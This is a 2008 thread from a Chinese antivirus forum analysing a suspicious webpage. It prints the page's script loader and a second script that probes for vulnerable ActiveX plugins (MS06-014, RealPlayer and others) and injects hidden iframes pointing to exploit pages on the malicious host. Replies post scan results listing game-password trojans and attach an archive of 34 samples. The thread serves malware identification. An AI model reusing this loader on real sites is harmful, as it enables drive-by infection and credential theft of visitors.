查看: 2157|回复: 6
收起左侧

[已鉴定] 可疑网马一个

 关闭 [复制链接]
SONGBOWEN
发表于 2008-6-23 11:22:59 | 显示全部楼层 |阅读模式
URL:http://www.soongba.cn/gm.htm

里边的源代码:
  1. <SCRIPT LANGUAGE="javascript">
  2. var expires = new Date();
  3. expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
  4. var set_cookie = document.cookie.indexOf("3Warea=");
  5. if (set_cookie == -1){document.cookie = "3Warea=1;expires=" + expires.toGMTString();
  6. document.write("<script src=http:\/\/www.soongba.cn\/webx.asp><\/script>");}
  7. </Script>
复制代码
http://www.soongba.cn/webx.asp的内容:
  1. window.onerror=function(){return true;}
  2.         try{
  3.                 var e;
  4.                 var Gf=document.createElement("\x6F\x62\x6A\x65\x63\x74");
  5.                 Gf.setAttribute("\x63\x6C\x61\x73\x73\x69\x64","\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36");
  6.                 var Ss=Gf.CreateObject("\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D","");
  7.         }
  8.         catch(e){};
  9.         finally{
  10.                 if(e!="[object Error]"){
  11.         document.write("<iframe width='0' height='0' src='http://www.soongba.cn/Ms06014.htm'></iframe>");
  12.                 }};
  13. function test()
  14. {
  15. rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
  16. try
  17. {
  18. Like = new ActiveXObject(rrooxx);
  19. }catch(error){return;}
  20. vvvvv = Like.PlayerProperty("PRODUCTVERSION");
  21. if(vvvvv<="6.0.14.552")
  22. document.write("<iframe width=0 height=0 src=http://www.soongba.cn/Real10.htm></iframe>");
  23. else
  24. document.write("<iframe width=0 height=0 src=http://www.soongba.cn/Real11.htm></iframe>");
  25. }
  26. test();
  27. try{if(new ActiveXObject("GLIE"+"Down.IE"+"Down.1"))window["document"]["write"]("<iframe width='5' height='5' src='http://www.soongba.cn/Lzzx.htm'></iframe>")}catch(e){};
  28. try{
  29. var g;
  30. var pppppppp=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
  31. catch(g){};
  32. finally{
  33. if(g!="[object Error]"){
  34. document.write("<iframe width='0' height='0' src='http://www.soongba.cn/pps.htm'></iframe>");}}
复制代码
granthill
发表于 2008-6-23 11:25:24 | 显示全部楼层
hahacomcn
发表于 2008-6-23 12:05:18 | 显示全部楼层
Begin scan in 'C:\Documents and Settings\haha\桌面\ok.exe'
C:\Documents and Settings\haha\桌面\ok.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [NOTE]      A backup was created as '488d2157.qua'  ( QUARANTINE )
tanlimo
发表于 2008-6-23 12:20:07 | 显示全部楼层
这东西可以穿还原

virus(34个).rar (506.67 KB, 下载次数: 114)
zhiyan
发表于 2008-6-23 13:42:24 | 显示全部楼层
34个,nod32查杀28个
qigang
发表于 2008-6-23 21:37:19 | 显示全部楼层
瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.Win32.Undef.ihm   

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.50.02
qigang
发表于 2008-6-23 21:40:04 | 显示全部楼层

69/33

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.PSW.Win32.GameOL.nvl
病毒: Trojan.PSW.Win32.ZhuXian.hx
病毒: Trojan.PSW.Win32.GameOL.ofo
病毒: Trojan.PSW.Win32.GameOL.oek
病毒: Trojan.PSW.Win32.GameOL.oda
病毒: Trojan.PSW.Win32.GameOL.oft
病毒: Trojan.PSW.Win32.GameOL.oci
病毒: Trojan.PSW.Win32.GameOL.odt
病毒: Trojan.PSW.Win32.Mapdimp.a
病毒: Trojan.Win32.Undef.ibx   
病毒: Trojan.PSW.Win32.ZeroOnline.dv
病毒: Trojan.PSW.Win32.ZhengTu.ynv
病毒: Trojan.PSW.Win32.RocOnline.lf
病毒: Trojan.Win32.Undef.ihm   
病毒: Dropper.Win32.Agent.gdv  

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.50.02
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 23:51 , Processed in 0.122506 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表